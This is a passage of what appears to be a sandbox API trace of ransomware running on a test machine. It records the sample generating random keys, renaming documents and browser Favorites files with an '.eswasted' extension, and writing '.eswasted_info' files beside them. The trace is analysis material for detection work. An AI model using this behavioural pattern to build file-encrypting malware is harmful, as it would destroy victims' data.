0xfc [0077.722] WriteFile (in: hFile=0xfc, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0077.722] SetEndOfFile (hFile=0xfc) returned 1 [0077.723] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.723] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0077.723] lstrcpyW (in: lpString1=0x4e1b26, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0077.723] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XzdNYU1.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xzdnyu1.rtf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XzdNYU1.rtf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xzdnyu1.rtf.eswasted")) returned 1 [0077.723] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XzdNYU1.rtf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xzdnyu1.rtf.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0077.723] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0077.724] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x9081 [0077.724] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9081) returned 0x2d0000 [0077.724] CloseHandle (hObject=0x110) returned 1 [0077.726] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0077.727] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0077.727] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0077.727] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0077.728] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0077.728] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0077.828] SetEndOfFile (hFile=0xfc) returned 1 [0077.830] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0077.830] CloseHandle (hObject=0xfc) returned 1 [0077.831] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0077.831] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4df688 | out: hHeap=0x4a0000) returned 1 [0077.832] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0077.832] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0077.832] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0077.832] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url") returned 71 [0077.832] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x298) returned 0x4e1ab8 [0077.832] lstrcpyW (in: lpString1=0x4e1b46, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0077.833] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ebff0 [0077.833] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0077.833] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ebff0 | out: pbBuffer=0x4ebff0) returned 1 [0077.833] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0077.833] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0077.835] WriteFile (in: hFile=0xfc, lpBuffer=0x4ebff0*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ebff0*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0077.835] SetEndOfFile (hFile=0xfc) returned 1 [0077.836] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.836] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0077.836] lstrcpyW (in: lpString1=0x4e1b46, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0077.836] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url.eswasted")) returned 1 [0077.837] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0077.837] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0077.837] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0xe2 [0077.837] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe2) returned 0x2d0000 [0077.837] CloseHandle (hObject=0xf8) returned 1 [0077.839] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0077.840] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0077.840] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0077.840] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0077.840] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0077.841] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0077.849] SetEndOfFile (hFile=0xfc) returned 1 [0077.851] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0077.851] CloseHandle (hObject=0xfc) returned 1 [0077.852] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0077.852] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0778 | out: hHeap=0x4a0000) returned 1 [0077.853] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0077.853] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0077.853] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0077.853] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 81 [0077.853] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2ac) returned 0x4f6210 [0077.853] lstrcpyW (in: lpString1=0x4f62b2, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0077.853] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ebff0 [0077.853] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0077.854] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ebff0 | out: pbBuffer=0x4ebff0) returned 1 [0077.854] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0077.854] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0077.855] WriteFile (in: hFile=0xfc, lpBuffer=0x4ebff0*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ebff0*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0077.862] SetEndOfFile (hFile=0xfc) returned 1 [0077.862] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.863] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0077.863] lstrcpyW (in: lpString1=0x4f62b2, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0077.863] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.eswasted")) returned 1 [0077.863] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0077.863] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0077.863] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x85 [0077.864] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x2d0000 [0077.864] CloseHandle (hObject=0xf8) returned 1 [0077.866] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0077.867] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0077.867] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0077.867] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0077.867] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0077.867] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0077.882] SetEndOfFile (hFile=0xfc) returned 1 [0077.884] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0077.884] CloseHandle (hObject=0xfc) returned 1 [0077.885] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f6210 | out: hHeap=0x4a0000) returned 1 [0077.885] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0860 | out: hHeap=0x4a0000) returned 1 [0077.886] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0077.887] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0077.887] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0077.887] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 91 [0077.887] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2c0) returned 0x4e1ab8 [0077.887] lstrcpyW (in: lpString1=0x4e1b6e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0077.887] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0077.887] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0077.888] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0077.888] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0077.888] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0077.888] WriteFile (in: hFile=0xfc, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0077.890] SetEndOfFile (hFile=0xfc) returned 1 [0077.890] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.890] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0077.890] lstrcpyW (in: lpString1=0x4e1b6e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0077.890] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url.eswasted")) returned 1 [0077.891] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0077.891] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0077.891] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x85 [0077.891] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x2d0000 [0077.891] CloseHandle (hObject=0x118) returned 1 [0077.893] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0077.893] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0077.893] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0077.893] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0077.894] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0077.894] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0077.902] SetEndOfFile (hFile=0xfc) returned 1 [0078.092] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0078.092] CloseHandle (hObject=0xfc) returned 1 [0078.094] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0078.094] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddd20 | out: hHeap=0x4a0000) returned 1 [0078.094] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0078.095] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0078.095] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0078.095] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 82 [0078.095] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2ae) returned 0x4f6210 [0078.095] lstrcpyW (in: lpString1=0x4f62b4, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0078.095] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0078.095] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0078.096] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0078.096] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0078.096] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0078.096] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0078.097] SetEndOfFile (hFile=0xfc) returned 1 [0078.097] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.097] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0078.097] lstrcpyW (in: lpString1=0x4f62b4, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0078.097] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url.eswasted")) returned 1 [0078.118] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.118] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0078.118] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x86 [0078.118] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x86) returned 0x2d0000 [0078.118] CloseHandle (hObject=0x118) returned 1 [0078.902] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0078.902] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0078.902] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0078.902] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0078.903] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0078.903] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0078.911] SetEndOfFile (hFile=0xfc) returned 1 [0078.913] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0078.913] CloseHandle (hObject=0xfc) returned 1 [0078.915] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f6210 | out: hHeap=0x4a0000) returned 1 [0078.915] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e18d0 | out: hHeap=0x4a0000) returned 1 [0078.915] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0078.916] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0078.916] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0078.916] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url") returned 70 [0078.916] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x296) returned 0x4d8aa8 [0078.916] lstrcpyW (in: lpString1=0x4d8b34, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0078.916] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0078.916] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0078.917] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0078.917] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0078.917] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0078.917] WriteFile (in: hFile=0xfc, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0078.918] SetEndOfFile (hFile=0xfc) returned 1 [0078.918] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.918] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0078.918] lstrcpyW (in: lpString1=0x4d8b34, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0078.919] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.eswasted" (normalized: 